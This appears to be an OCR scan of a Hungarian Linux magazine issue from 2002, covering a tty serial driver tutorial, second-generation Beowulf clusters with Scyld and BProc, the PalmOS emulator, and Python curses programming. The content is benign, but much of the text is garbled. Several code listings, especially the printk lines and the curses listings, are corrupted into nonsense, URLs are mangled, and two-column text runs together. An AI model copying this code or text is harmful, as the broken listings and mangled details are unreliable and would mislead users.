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printk (KERN DEBUG 
" - INBOUND XON/XOFF is enabled, " 
"XON - 52x, XOFF - 
etart char, etöp. chat) ; 


52x!, 


else 
printk (KERN DEBUG 
sz" - INBOUND XON/XOFF " 


"is disabled") ; 


/r if we are implementing OUTBOUND XON/XOFF F/ 
LE (I TXON(tey)] 


printk (KERN DEBUG 
" - OUTBOUND XON/XOFF is 
ssenabled, " 
S "XON - 52x, XOFF - 52x", 
szararc. ehát, stop chat) 1 
else 
printk (KERN DEBUG 
sz" . OUTBOUND XON/XOFF " 


ess, disabléd"] :§ 

] 
Végül szükségünk van az átviteli sebesség megállapítására. 
Szerencséreatty get baud rate függvény segítségével a 
termios-beállításokból kinyerhető az adat, mégpedig egész 
típusú értékként: 
/F get the baud rate wanted F/ 
printk (KERN DEBUG " - baud rate - sd", 

tty get baud rateí(tty) ) ; 
Most, hogy minden szükséges csatornabeállítást meghatároztunk, 
már csak rajtunk múlik, hogy az eszközt ennek az adatnak a 
segítségével megfelelően beállítsuk. 


Egyéb tty-adatok 

Vern Hoxie kitűnő leírásgyűjteményt írt példaprogramokkal arról, 
hogy a soros kapuk hogyan érhetőek el a felhasználói területről. 
Az anyag az 3 ftp:/scicom.alphacdc.com/pub/linux címen érhető 
el. Az adatok nagy része egy rendszermag-programozónak ugyan 
nem lesz túl hasznos, de az ioct1 (2) parancsok leírásai közül 
néhány, és a tty-adatok beállításainak, illetve visszakeresésének 
különböző módjairól, s a háttérben meghúzódó előzményekről 
leírtak egészen jók. Aki tty-eszközmeghajtó írására szánja magát, 
annak melegen ajánlom ezeknek a részeknek az átolvasását, ha 
másért nem, azért, hogy tisztában legyenek vele, miként próbálják 
majd a felhasználók használni a meghajtónkat. 


Végszó 

Szeretnék köszönetet mondani A! Borchers-nek, amiért segített 
megfejteni a write () hívás pontos, minden apró részletre 
kiterjedő működését. Peter Berger-rel együtt ő a szerzője a Digi 
AccelePort eszközök számára írt 

drivers/usb/serial/digi acceleport.c nevű USB soros átalakító 
meghajtónak. Ez a jól működő tty-eszközmehajtók tökéletes 
mintapéldája. 


Linux Journal 2002. október, 102. szám 


Greg Kroah-Hartman 

(greg okroah.com) jelenleg a Linux-rendszerek 
USB és gyors csatlakoztatású (PCI Hot Plug) 
egységeinek rendszermagba épített meghajtó- 
programjainak fejlesztője. Az IBM-nél dolgozik. 
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A Beowulf fejlődése 


A Beowulf-géptelepek második nemzedéke egyetlen térben elhelyezkedő 
folyamatokat, vékony rabszolga-csomópontokat és grafikus segédprogramokat 
kínál, továbbá az alkalmazkodóképessége és a kezelhetősége is jobb. 


egy benzinkúthoz, és azt mondod a kútkezelőnek: 

, Töltse tele, ellenőrizze az olajszintet és az ablaktörlőt, 
és adjon még 20 lóerőt, legyen szíves!" A benzinkutas nem 
lepődik meg a kérésen, hanem ezt válaszolja: , Összkerékmeg- 
hajtást is kér? Úgy hallottam, hóesés várható az éjjel." Elgon- 
dolkozol egy másodpercre, majd beleegyezel, ugyanis az 
összkerékmeghajtás hasznos dolog. 

Bárcsak ilyen könnyen alkalmazkodó autóink és Beowulf- 
géptelepeink lennének! A Beowulf 2 legfontosabb megkülön- 
böztető sajátossága alkalmazkodóképessége - ha az igény 
növekszik, többletszámítási teljesítményt tud adni. A Beowulf 
alkalmazkodóvá válásának megértéséhez és értékeléséhez a 
először Beowulf 1-et kell megismernünk. 


KK épzeld el egy pillanatra, hogy gépkocsiddal betérsz 


A Beowulf gyökerei 

Mostanra már mindannyian tudjuk, hogy a Beowulf-gépte- 
lepek ötlete Donald Becker fejéből pattant ki, amikor a NASA 
Goddard intézetében dolgozott 1994-ben. A lényege az volt, 
hogy egyszerű számítógép-alkatrészekből felépített párhu- 
zamos rendszer bizonyos feladatok esetén egy nagyságrendet 
javít az ár/teljesímény arányon. Az ötlet a valóságban is bevált, 
az első Beowulf-géptelep, a Wiglaf 1994 végén épült meg. 

A Wiglatban 16 darab 66 MHz-es Intel 80486 processzor dol- 
gozott, amelyeket később 100 MHz-es DX4-ekre cseréltek. 

A teljesítmény átlagosan 74 Mflops/s volt (74 millió lebegőpon- 
tos művelet másodpercenként). Három évvel később Becker 
és a CESDIS csapat elnyerte a tekintélyes Gordon Bell-díjat. 

A díjat azért a Pentium Pro processzorokat használó géptele- 
pért adták, amelyet az 1996-os SuperComputing Conference-re 
építettek, és amely elérte a 2.1 Gflops/s (2,1 milliárd lebegő- 
pontos művelet másodpercenként) teljesítményt. A Goddard- 
nál kifejlesztett programot ekkor már sok egyetemen és 
kutatóintézetben széles körben használták. 


A Beowulfok első nemzedéke 

Az első nemzedékbe tartozó Beowulfok jellemző vonásai a 
következők voltak: közönséges számítógépek, nyílt forráskódú 
operációs rendszerek (például Linux vagy FreeBSD) és magán- 
hálózaton elhelyezkedő számítócsomópontok. Ráadásul min- 
den csomóponton teljes értékű operációs rendszer futott, és 
minden csomópontnak saját folyamattere volt. 

Ezek az első nemzedékbeli Beowulfok az üzenettovábbításra 
külön programot használtak: vagy a PVM-et (párhuzamos 
virtuális gép), vagy az MPI-t (üzenettovábbító felület). Az adat- 
csere jellemző módja az üzeneteknek nagyteljesítményű gép- 
telep számolócsomópontjai közti továbbítása volt. 

Némi gond is akadt a Beowulfok első nemzedéke körül, ame- 
lyek legfőképpen abból következtek, hogy az új géptelepek 
kezelésére használt rendszerfelügyeleti eszközök fejlődése 
elmaradt a párhuzamos programokétól. Végtére is a Beowulf 
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nagyteljesítényű párhuzamos feladatokra lett kitalálva, és 
sokkal kevesebb figyelmet fordítottak a hordozható és meg- 
bízható rendszerfelügyeleti programok kifejlesztésére. A korai 
Beowulfokkal kapcsolatos nehézségek a következők voltak: 


e Nehéz volt őket telepíteni: vagy a munkaigényes, minden 
csomópontot egyenként telepítő megközelítést választ- 
hattuk (ahol gyakran csúsztak be gépelési hibák), vagy a 
bonyolultabb, minden csomópontot egyszerre, a hálózaton 
keresztül telepítő módszert a PXE/IFIP/NFS/DHCP hasz- 
nálatával — az összeset helyesen beállítani és egyszerre 
futtatni már önmagában is hőstettnek bizonyult. 

e — lelepítés után a Beowulfokat nehéz volt karbantartani. 
Gondoljunk csak egy közepesen nagy géptelepre, csomó- 
pontok tucatjaival vagy százaival. Mi történik, ha új Linux- 
rendszermag jelenik meg, mint például a 2.4-es az SMP-re 
kihegyezve? Ha a számolócsomópontokon az új rendszer- 
magot szeretnéd futtatni, telepíteni kell a megfelelő helyre, 
majd közölni a LILO-val (vagy a kedvenc rendszerbetöltőd- 
del) a változás tényét, mindezt több tucatszor vagy több 
százszor. A csomópontok frissítéséhez az rsh és az rcp 
programokat használták. Ezek a programok azt igénylik, 
hogy a számolócsomópontokon felhasználókat kezelő 
segédprogramok legyenek, továbbá biztonsági rések özö- 
nét nyitják meg. 

e A géptelepet nehéz volt módosítani: a teljesítmény növe- 
lése új számolócsomópontok hozzáadásával csak a germán 
istenekhez történő buzgó fohászkodások közepette volt 
lehetséges. A csomópont hozzáadásához telepíteni kellett 
az operációs rendszert, frissíteni kellett a beállítóállományo- 
kat (sok kis trükkös fájlt), valamint a felhasználói területet 
a csomópontokon, és természetesen minden párhuzamos 
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1. Camm Maguire ccammigenhanced com: 
Port Coordinator 
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számítást érintő kódot is, amely saját maga is beállítást 
igényel, elvégre használni is szeretnénk az új csomópontot, 
nem igaz? 

e Az egész nem úgy nézett ki, mint egy számítógép. Sokkal 
inkább hasonlított független csomópontok halmazára, ahol 
mindegyik csomópont a maga dolgával törődött, és néha 
kellő ideig együttműködött a többiekkel, hogy egy párhu- 
zamos számítási feladatot végezzen el. 


Röviden, a Beowulf 1 sikeres volt a közönséges számítógépek 
teljesítményének kihasználásában, de még messze volt egy 
ipari erejű számítóeszköztől. 

Az elmúlt egy évben a Rocks és az OSCAR géptelepes prog- 
ramterjesztései összegezték az eddigi Beowulf 1-fejlesztéseket 
(lásd a ,Beowulf-tudatállapot" c. cikket a Linuxvilág 2002. 
júniusi és az ,/OSCAR-forradalom" c. cikket a Linuxvilág 2002. 
júliusi számában). De ha a beowulfos számítások bonyolul- 
tabbá válnak, a használatnak pedig egyszerűsödnie kell, akkor 
rendkívül sok Linux-programozásra van szükség. Itt lép a 
képbe a Beowult 2, a Beowulf következő nemzedéke. 
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A Beowulf második nemzedéke 

A második nemzedék újítása, hogy a leggyakoribb hibákat 
okozó összetevőket kiküszöbölték, az új felépítés sokkal 
egyszerűbb és megbízhatóbb lett, mint az első nemzedékben. 
Don Becker műszaki igazgató vezetésével a Scylid Computing 
Corporation, valamint pár ember az eredeti NASA Beowulf- 
csapatból olyan jelentős áttörést ért el a Beowulf-módszerben, 
mint amilyen maga a Beowulf megjelenése volt 1994-ben. 
lovábbra is közönséges számítógépeket és üzenetküldő prog- 
ramokat használnak a Beowulft 2-ben, de jelentős módosítások 
történtek a csomópontok telepítésének és a folyamattér elosz- 
tásának területén. 


BProc 

A Beowulf második nemzedékének lelke a BProc, ami az osz- 
tott Beowulf-folyamattér rövidítéséből kapta a nevét. A BProc 
fejlesztője Erik Arjan Hendriks, a Los Alamos National Lab 
munkatársa. A BProc néhány rendszermag-módosításból és 
rendszerhívásból áll, egy folyamatnak egyik csomópontról a 
másikra történő áthelyezését ezek teszik lehetővé. A folyamat 
áthelyezése teljesen az alkalmazás ellenőrzése alatt áll — az 
alkalmazás saját maga határozhatja el, hogy másik csomópont- 
ra akar-e költözni, és ezt az rfork rendszerhívással kezdemé- 
nyezheti. A folyamat a csatolt fájlkezelők nélkül költözik át, 
ami gyors és könnyű áttérést tesz lehetővé. Minden szükséges 
fájlt maga az alkalmazás nyit meg újra a célcsomóponton, 
minden hatalom az alkalmazás folyamatáé. 

lermészetesen értelmetlen volna egy folyamatot egy másik 
csomópontra áthelyezni, ha a távoli folyamatot nem lehet 
kezelni. A BProc ezt úgy oldja meg, hogy minden áthelyezett 
folyamathoz egy , szellemfolyamatot" helyez el a vezérlő 
csomópont folyamattáblájában. Ezek a szellemfolyamatok nem 
foglalnak memóriát a vezérlőcsomóponton, egyszerűen csak 
olyan bejegyzések, amelyek jelzéseket tudnak fogadni és képe- 
sek bizonyos műveleteket a távoli folyamat nevében végrehaj- 
tani. Például a szellemfolyamaton keresztül a távoli folyamat 
jelzéseket kaphat, beleértve a SIGKILL és SIGSTOP jelzéseket, 
továbbá gyermekfolyamatot is indíthat. Mivel a szellemfolya- 
matok a vezérlőcsomópont folyamattáblájában jelennek meg, 
a folyamatok állapotát kijelző segédeszközök az ismert módon 
működnek. 

A BProc elegáns egyszerűsége messzire ható következmények- 
kel jár. A legnyilvánvalóbb hatás, hogy a Beowulf-telep most 
látszólag egyetlen folyamattérrel rendelkezik, amelyet a vezér- 
lőócsomópont irányít. Az egyetlen, az egész géptelepre kiterjedő 
folyamattér központosított felügyelettel egyetlen rendszer 
látomását kelti, mintha csak egyetlen számítógéppel lenne 
dolgunk. Ráadásul a BProc-nak nincs szüksége rcp-re és 
rlogin-ra a folyamatok kezeléséhez, hiszen a folyamatokat 
közvetlenül a vezérlőcsomópont vezérli. Ezeknek a parancsok- 
nak a kiküszöbölése azt jelenti, hogy a számolócsomópontokon 
nincs szükség a felhasználók kezelésére, így jelentősen csökken 
az operációs rendszer mérete. A BProc futtatásához a számoló- 
csomóponton mindössze néhány démon szükséges: a 
bpslave és a sendstats. 


0 Kiskapu Kft. Minden Jog fenntartva 


A Scyid megvalósítása 

A Scyld teljesen átvette a BProc-ot, és olyan bővíthető géptele- 
peket építhetünk a segítségével, amely a számoló csomópon- 
tokon csak a BProc folyamat futásához elengedhetetlenül 
szükséges összetevőket hagyta meg. A végeredmény egy 
ultravékony számolócsomópont, amely a Linuxnak csak egy 
kis részét futtatja, épp annyit, amennyi a BProc-nak szükséges. 
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A BProc és az ultravékony Scyld-csomópontok előnyei össze- 
adódnak, és ez nagy hatással van a géptelep kezelhetőségére. 
Két megkülönböztető jellemzője van a Scyld-terjesztésnek és 
a Beowult 2 géptelepeknek. Az első, hogy géptelep bővíthető, 
egyszerűen lehet hozzáadni újabb csomópontokat. Mivel a 
csomópontok ultravékonyak, a telepítés annyiból áll csupán, 


hogy a rendszert a Scyld rendszermagjával el kell indítani, 


Zárt 
hálózat 


számoló- 
csomopont 


számoló- 
csomópont 


számoló- 
csomopont 


GET Tot elosztó) 
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MgAdjos 
csomópont 


nyilvános 


Egy jellemző Beowulf-rendszer fizikai kialakítása 


valamint a BProc vándorló folyamatait illetően fogadóképessé 
kell tenni. A második, hogy a vegyes változatok gondját kikü- 
szöbölték. Az olyan géptelepeken, amelyekben a csomópontok 
teljes Linux-telepítéssel rendelkeznek, előfordulhat a válto- 
zatok keveredése. Az idő előrehaladtával megeshet, hogy a 
programok frissítésekor egyes csomópontok nem működnek, 
akár frissítési hiba miatt, akár a programozó hibája miatt, 

ezért ahelyett, hogy minden csomóponton szigorúan ugyanaz 
a program futna, az egyes csomópontok között eltérések 
keletkeznek. Mivel a BProc futásához a csomópontokon csak 
nagyon kevés program futása szükséges, ezt a gondot gyakor- 
latilag elkerüljük. 

lermészetesen a folyamatok áthelyezésének képessége vékony 
csomópontokra önmagában semmit nem old meg. A Scyld a 
megoldás többi részét a különleges Scyid Beowultf-terjesztés 
részeként nyújtja, ami az alábbi sajátosságokkal bír: 


e . BeoMPI. üzenettovábbító programkönyvtár, amely megfelel 
az MPI szabványnak, és az Argonne National Lab MPICH 
(MPI Chameleon) projektjének leszármazottja, amelyet a 
BProc programmal való együttműködés céljából tovább- 
fejlesztettek. 

e . BeoSetup: grafikus felület a számolócsomópontok BeoBoot 
rendszerindító lemezlenyomatainak elkészítéséhez. 

e — Beofdisk: segédprogram a számítócsomópontok merev- 
lemezének felosztásához. 

e — BeoStatus: grafikus felület a géptelep állapotának 
figyeléséhez. 


Nézzük meg, hogyan kell használni ezeket az eszközöket 
a Scyid Beowulf-géptelep felépítése közben! 

Megveheted a Scylid Beowulf Professional Editiont 

(2 http:/www.scyld.com), amelyhez rendszerindításra 
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alkalmas telepítő-CD, leírás és egyéves támogatás jár. 

A Professional Edition látványos, és sok fejlett géptelepkezelő 
programot támogat, például a párhuzamos virtuális fájlrend- 
szert (PVF5). A másik lehetőség a Scyld Basic Edition beszer- 
zése, a CD a Linux Centralnál (2 http:/www.linuxcentral.com) 
2,95 dollárba kerül. A Basic Editionból hiányzik néhány dolog, 
ami a Professional Editionben megtalálható: nincs leírás és 
támogatás. Mindkettőt használva építettem már géptelepet, 
nem volt semmi nehézség. 

Fontos, hogy az ábránkon láthatóhoz hasonló Beowulf-elren- 
dezést hozz létre, ez az általános Beowulf- (1 és 2) elrendezés. 
A vezérlőcsomópontban két hálókártya van, az egyik a nyilvá- 
nos hálózat, a másik a számítócsomópontok zárt hálózata felé 
vezet. A Scyid Beowulf azt feltételezi, hogy a hálózatot úgy 
állítottad be, hogy az eth0 vezet a nyilvános hálózathoz és az 
eth1 a belső hálózathoz. A telepítés megkezdéséhez a Scyld 
CD-t helyezd a vezérlőcsomópont CD-meghajtójába, és kap- 
csold be a számítógépet. 

A Scylid Beowulf telepítése gyakorlatilag megegyezik a Red 
Hat Linux telepítésével. A rendszerindító parancssorába írd 
be az instal1 szót, ezzel indítható a vezérlőcsomópont telepí- 
tése. Ha megvárod, hogy a rendszerindítás magától folytatód- 
jon, akkor alapértelmezés szerint a számolócsomópont 
telepítése indul el. 

Lépkedj végig az egyszerű telepítési folyamaton, ahogyan 

a Red Hat Linux esetében tennéd. Ha először telepítesz gépte- 
lepet, azt javaslom (és a következőkben erről írok), hogy a 
Gnomec-os telepítést válaszd a szöveges módú telepítő helyett. 
A Gnome-os telepítő választásával elérhetőek lesznek a menő 
grafikus Beo-segédprogramok, amelyek beépülnek a Gnome 
munkaasztali környezetbe, és géptelep telepítésének további 
részét jelentősen megkönnyítik. 

Az eth0 szokásos beállítása után jön az eth1 beállítása a 
vezérlőcsomóponton és a számítócsomópontok IP-címeinek 
megadása. Ez a lépés jelenti az egyik kulcsfontosságú különb- 
séget a Scyld és a Red Hat Linux telepítése között. A telepí- 
tőprogram kér egy IP-címet (pl.: 192.1683.1.1) az eth1 számára, 
és egy IP-címtartományt (pl.: 192.168.1.2 — 192.168.x) a számító- 
csomópontoknak. Ez elég egyszerű, de nem árt meggyőződni 
róla, hogy az IP-címtartomány elég nagy-e ahhoz, hogy min- 
den számolócsomópontnak külön IP-címe legyen. 

Hátravan még néhány lépés a telepítésből, például az X beál- 
lítása. Az egyszerűség kedvéért válaszd a grafikus bejelent- 
kezést. Fejezd be a vezérlőcsomópont telepítését a rendszer- 
indító lemez elkészítésével, távolítsd el a lemezeket a meghaj- 
tókból, és indítsd újra a vezérlőcsomópontot. 

Lépj be rendszergazdaként. A Scyld által testreszabott Gnome- 
munkaasztal elindul, beleértve a BeoSetup és a BeoStatus 
programokat és a számolócsomópontok telepítésének leírását. 
A rendszerindításhoz minden számolócsomópontnak egy 
BeoBoot-lenyomat szükséges, amely lehet hajlékonylemezen 
vagy a Scylid CD-n. Jobban szeretem, ha minden csomópont- 
hoz egy-egy hajlékonylemezt készítek, mint ha a CD-vel kell 
szaladgálni egyik géptől a másikig. A BeoBoot-lenyomatokat 

a BeoSetup segédprogram készíti el. A BeoSetup programban 
kattints a Node Floppy gombra, helyezz egy üres lemezt a meg- 
hajtóba, és a lemez elkészítéséhez kattints az OK gombra. 

A folyamatot addig ismételd meg, amíg el nem készül a kellő 
számú lemez. Az indítólemezeket helyezd a számolócsomó- 
pontok meghajtójába, és kapcsold be a számítógépeket! 
Meglehetősen érdekes, ami ezután történik, bár a felhasználó 
nem láthatja (hacsak nem kötsz egy monitort a számolócsomó- 
pontra). Minden egyes számolócsomópont betölti a BeoBoot-le- 





nyomatot, felismeri a hálózati eszközt, telepíti az eszközvezér- 
lőket, és RARP-kéréseket küld ki. Ezekre a RARP-kérésekre a ve- 
zérlőcsomóponton figyelő Beoserv démon válaszol, IP-címet, 
rendszermagot és ramlemezt küld minden számítócsomópont- 
nak. Külön nevet is adtak a folyamatnak, amely során a számo- 
lócsomópont feléleszti magát egy hajlékonylemezről betöltött 
minimális tudású rendszermaggal, amelyet ezután a végleges, 
sokkal bonyolultabb rendszermagra cserél le a vezérlőközpont- 
ból. A folyamat neve Iwo Kernel Monte. A számolócsomópont 
ezután újraindítja magát a végleges rendszermaggal, megis- 
métli az eszközök felismerését és a RARP-kérést, majd felveszi 

a kapcsolatot a vezérlőcsomóponttal és a BProc részévé válik. 

A Iwo Kernel Monte alatt a számolócsomópont hálózati kár- 
tyájának MAC-címe a BeoSetup Unknown Addresses (ismeretlen 
címek) ablakában helyezkedik el. A géptelephez úgy lehet őket 
hozzáadni, hogy a címeket kijelölöd és a középső Configured 
Nodes (beállított csomópontok) oszlopba húzod őket, majd 
megnyomod az Apply (alkalmaz) gombot. Miután a vezérlő- 
csomópont végzett a számolócsomópontok rendszerbe illesz- 
tésével, a somópont mellett megjelenik az up címke. A csomó- 
pont állapota a BeoStatus programban is megjelenik. 

A számolócsomópontok merevlemezét az alapértelmezett 
beállítás (/etc/beowulf/fdisk) szerint a következő két paranccsal 
lehet felosztani: 


beofdisk -d 
beofdisk -w 


A -d kapcsolóval tudatjuk, hogy a /etc/beowulf/fdisk fájlban 
megadott alapértelmezett beállításokat használjuk, a -w végzi 
el a táblázatok kiírását a számolócsomópontokon. Ezután át 
kell írni a /etc/beowulf/fstab ; fájlt, hogy a csereterület (swap) 
és a / fájlrendszer az új lemezrészekre mutasson. ledd meg- 
jegyzésbe a SRAMDISK sort a /etc/beowulf/fstab-ban, ide volt 
befűzve a / fájlrendszer, mielőtt még a lemezt felosztottad 
volna. A következő két sorban add meg a csereterület és a / 
fájlrendszerek helyét a /dev/hda2 és /dev/hda3 eszközökön 

(a dev/hda1 a rendszerindító lemezrésznek van fenntartva). 
Ha a rendszert merevlemezről szeretnéd indítani, a Beoboot- 
lemezlenyomatot átírhatod a rendszerindító lemezrészre: 


beoboot-install -a /dev/hdal 
Ezután a /etc/beowulf/fstab fájlhoz hozzá kell adni egy sort: 


/dev/hdal beoboot ext2 defaults 0 0 
A változások érvényesítéséhez minden számolócsomópontot 


újra kell indítani: 
bpctl -S all -s reboot 


Ennél egyszerűbb nem is lehetne. A Beowulf 1-gyel ellentétben 
a Scyld Beowulf csak a vezérlőcsomóponttra telepít teljes Linux- 
terjesztést. A számolócsomópontok merevlemezére semmi nem 
íródik a telepítés alatt, emiatt ezek ultravékonyak, könnyen 
karbantarthatók és gyorsan újraindíthatók lesznek. 

A géptelep kipróbálásához futtathatod a nagyteljesítményű 
Linpack benchmark programot, amely része a terjesztésnek. 

A parancssorban add ki a linpack parancsot. 

Kicsit látványosabb a Mandelbrot-halmaz kirajzoltatása, ame- 
lyet az mi-mandel alkalmazással próbálhatunk ki. Ugyan- 
csak része a terjesztésnek. Ha az mbi-mande1-t öt csomó- 
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ponton szeretnéd elindítani, ezt írd a parancssorba: 
NP-5 mpi-mandel 


Mindent együttvéve az egyetlen folyamattér, a folyamatok 
gyors áthelyezésének lehetősége az alkalmazás segítségével, 

a vékony csomópontok és a grafikus segédprogramok, ame- 
lyekkel a Scyld géptelep felépíthető és figyelhető, olyan megol- 
dást eredményeznek, amely a Beowulf 1-et teljességben, alkal- 
mazkodóképességben és kezelhetőségben felülmúlja. Fenti 


kérdésünkre a válasz megerősítő, ehhez a géptelephez csak- 
ugyan további lóerőket lehet hozzáadni. 
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Pózoljunk Linux alatt! 


A népszerű Palm-gépekkel folytatjuk sorozatunkat. 


havi témánk a POSE, azaz a 
a PalmOS Emulátor. A POSE, mint 

a neve is mutatja, a Palm-gépek 
rendszerének az utánzására született. 
Nagyon kellemes felületet kapunk a kis 
kézi gépek emulálásának használatához, 
valamint beállításához. lelepítése 
Debian/GNU Linux alatt elég egyszerű, 
csak adjuk ki a következő parancsot: 
apt-get install pose. Ezután a 
csomag telepítése rendben lezajlik. Ha 
valaki nem rendelkezik a telepítőkész- 
lettel, esetleg nincs internetelérése, ne- 
tán valamelyik másik Linux-kiadást 
használja, az nézzen körül a CD Maga- 
zin/POSE könyvtárban, hátha talál a 
rendszeréhez megfelelő változatot, 
illetve utolsó lehetőségként le is fordít- 
hatja a programot. 


Az első lépések 

A pose parancs segítségével indíthatjuk 
a programot, amelynek első indításakor 
egy szinte üres fehér ablak jelenik meg. 
Ebben a következő szöveg olvasható: 
Right click on this window to show a 
menu of commands, szabad fordításban 
, A jobb egérgomb kattintására felbuk- 
kan a menü" . 

Mint azt már a kedves olvasók 
megszokhatták, az emulációs témának 
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egy nagyon nehéz része van, az pedig 
mindig a kezdete! Most is, mint eddig 
mindig, be kell szereznünk egy eredeti 
Palm ROM-ot, amit legkönnyebben úgy 
tudunk megtenni, hogy , lefejjük" a saját 
gépünkről. Csatlakoztassuk a soros 
kapura a készüléket, majd a jobb egér- 
gomb kattintása után válasszuk a 
Transfer ROM... menüpontot. Esetleg 
használhatjuk az elegánsabb megoldást: 
nyomjuk le az ALr-4-D billentyűzetkom- 
binációt, és máris előugrik a letöltésab- 
lak. Itt állítsuk be, hogy a készülék 
melyik kapura milyen sebességgel kap- 
csolódjék, majd a Begin gombra kat- 
tintva elkezdődik a művelet. Ahogy az 
a letöltésablakban olvasható, kilenc 
pontból álló irományban is olvashatjuk, 
a letöltés jó ideig eltarthat, így türel- 
mesen várjunk. Ha mégis valami hiba 
adódna, esetleg a program lefagyna, 
adjunk neki egy kis időt, hátha magá- 
hoz tér még. 

Miután a ROM sikeresen letöltődött, 
adjunk neki nevet, és mentsük. 


A felélesztés 

Használjuk ismét a jobb egérgombos 
kattintást, a menüben válasszuk ki a 
New... menüpontot (vagy nyomjuk le 

az ALT-HN billentyűzetkombinációt), 
ekkor a kettes képen látható ablakot 
kapjuk. Válasszuk a ROM file: legördülő 
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menüt, ebben pedig értelemszerűen az 
Other...-t. Ekkor egy fájlböngésző nyílik 
meg, amiben könnyedén kiválaszthatjuk 
az előzőekben elmentett ROM fájlt. 
Módosíthatjuk az emulálni kívánt gé- 
pünk típusát; és ha rendelkezünk meg- 
felelő bőrrel, akkor azt is kicserélhetjük 
rajta. lovábbá megadhatjuk a memória- 
méretet, ami 512 K-tól 16 MB-ig változ- 
hat. Miután ezzel is végeztünk, az OK-ra 
kattintva a gép elindult. 

A következő hónapban sorozatunk 
folytatásában a programok beszerzését, 
telepítését és az emulátor további 
beállításait taglaljuk. 

Addig is kellemes pózolást! 


Csontos Gyula 

(Csontos Gyulaolinuxvilag.hu) 
a Linuxvilág szakmai és 
CD-szerkesztője. Szabad- 
idejében szívesen mászik 
hegyet és kerékpározik. 





Kapcsolódó címek 


2 http:/Avww.palm.com 

2 http:/Avww.palmsource.com 

2 http:/Awvww.palmos.com 

2 http://www.topicsites.com/ 
ebooks/palm-programs.htm 

2 http://maccentral.macworld.com/ 
news/0012/11.professor.shtml 

2 http:/Avebusers.physics.umn.edu/ 
-tgredig/palm.html 

2 http:/Avwvw.mobilecomputing.com 
/showarchives.cgi? 148: 1 

2 http:/Avww.thoracic.org/palm/ 
default.asp 





. Szaktekintély — 


Python-ablakok szöveges módban 


Felhasználói felületek készítése szöveges módban 
a curses programkönyvtár segítségével. 





ythonos sorozatunk e részében a szövegalapú felhasz- Következő lépésként beállítjuk, hogy a lenyomott billentyűk- 
9 nálói felületek készítésének fortélyaival ismerkedünk höz a képernyőn ne jelenjen meg karakter, vagyis csak abban 
meg. Látni fogjuk, hogy ezúttal talán még egyszerűbb az esetben, ha erre a curses valamilyen kiíró függvényen 
dolgunk lesz, mint grafikus megfelelőik esetében, köszönhe- keresztül külön utasítást kap: 
tően nagyrészt a curses bővítmény egyszerűen használható 
függvényeinek. curses.noecho() 


Linux és Unixok alatt általában sokféle termináltípus létezik, 
és mindegyiknek megvannak a saját vezérlőkarakterei. Így ha Megszokhattuk, hogy konzolon általában akkor történik 
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a curses nélkül kezdenénk neki szöveges módú alkalmazások valami, ha a begépelt parancssor végén ENTER-t nyomunk. 
készítésének, bizony jókora terhet vennénk a nyakunkba. Ebben az esetben azonban minden egyes lenyomott karaktert 
Ezt a zűrzavart elkerülendő jött létre a curses könyvtár, mellyel — programunk csak az ENTER billenytű lenyomása után észlel. 
nincs szükségünk a megjelenítő részletekbe menő ismeretére, Ha szükségünk van arra, hogy az egyes billentyűkre azonnal 
elég, ha azzal tisztában vagyunk, hogy a curses-t hogyan kell válaszolni tudjunk, a következő utasítást kell begépelnünk: 
megszelídíteni. 

Óhatatlanul felmerülhet az emberben a kérdés, hogy mi szük- curses.cbreak() 

ség van szöveges módú alkalmazásokra most, a grafikus operá- 

ciós rendszerek korában? A válasz egyszerű: egy szöveges Ennek következtében külön-külön felelhetünk minden ese- 
módú alkalmazás esetében nem kell segédprogramok garma- ményre, viszont ha a különleges billentyűket — úgymint fel, 
dáját feltelepíteni, nincs szükség X-kiszolgálóra, ráadásul tár- le, home, end stb. — is megfelelően szeretnénk kezelni, ezt az 
helyet és a kisebb gépek esetén erőforrásokat spórolhatunk utasítást is adjuk ki : 


ezzel a megoldással! Nem is beszélve arról, hogy sokan még 

a gondolattól is ódzkodnak, hogy valamilyen élesben működő curses.keypad(1) 

kiszolgálóra grafikus programot telepítsenek. 

A DOS-on felnőtt nemzedék még biztosan emlékezik a Borland Ezután ha benyomjuk mondjuk a balra mutató nyilat, a curses 
egyszerűen használható, tetszetős IurboVision programjára. 

TurbovVisionben készíthetünk menüket, ablakokat, gombokat, 

játszhatunk a színekkel, létrehozhatunk gördítősávval ellátott 7. lista Egyszerű curses program 
szövegmezőket, vagy amit csak akarunk. A curses ugyan nem 


nyújt ennyi szolgáltatást, de létezik hozzá egy sor kiegészítés, ls def fijcdező esen 
melyek pont ezt hivatottak pótolni. 28 stdsEbBPC7Eschos 
A curses a Python terjesztésnek lényeges részét képezi, így 3 curses.echo() 
a feltelepítésével nem kell külön foglalkoznunk. A modulban 4 . curses . nocbreak () 
található függvények pedig teljes egészében a rokon C könyv- 55 curses . endwin () 
tárban található függvényeknek felelnek meg, egy-két egy- 6 
szerűsítéstől eltekintve. Ilyen különbség például, hogy Python- be from time import sleep 
ban csupán egyetlen addstr () függvény létezik, ami a C 8 . import. curses 
könyvtár addstr ( ) , mvaddstr () és mvwaddstr () függvé- 8 import traceback 
nyeit helyettesíti. 150 S 
Most pedig vágjunk bele! JE ége 
iz SEdSEeS S SSGÜBSSSE MIT ESEB 
A kezdő lépések THERE GÜNSSE SBS S ETO 
A curses bővítmény programunkba illesztését (import) követően 14 . SELSENSZESEdSET SS ÜT 20 AES 0 AKOS) 
még el kell végeznünk néhány dolgot, mielőtt a teljes képer- T4STS screen. box () 
nyőt a birtokunkba vehetnénk. Elsőként meg kell hívni az 168 screen.refresh() 
initser () függvényt, ami — miután felismerte az adott termi- 7 
náltípust — belső adatszerkezeteit felkészíti a használatra és létre- 18 ESC oteI 
hozza őket. A függvény egy képernyőobjektummal tér vissza. a58 
20 Ed madészateiomő 
import curses 247bEs EGES DBE 
etdSCr s CÜrSésS iNiICSCEl) D2 FinabizaeTtont 
21088 
Az initscr () által visszaadott objektumot stdscr-nek szokás 24. traceback.print exc() 


hívni, ami lefedi a programunk által használható teljes felületet. 
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2. lista Játék a színekkel 
import curses.wrapper 


def teszti(stdscr) : 
stdscr dőcsaW 


90 HB WIEE 


cűrses . 1T11 (jeesjátsktetőő 

mm curses . CORE EEMAKTTKEB8 
scurses . COJRBBEN[/) 

978E SEUSEtNaddStG (2 esz Se ETek 
Scütses colos padt (191 
"—"cÜTtSéS AT BODD) 


vilgg!", 


8 

9e stdscr.refíresh() 

IO 

JB ch c stdscr. Ggetch() 
TSZ s 

ejiS s curses . wrapper (teszt1) 


a saját ábrázolásának megfelelően curses . KEY LEFT-ként 
továbbítja az alkalmazásnak. 

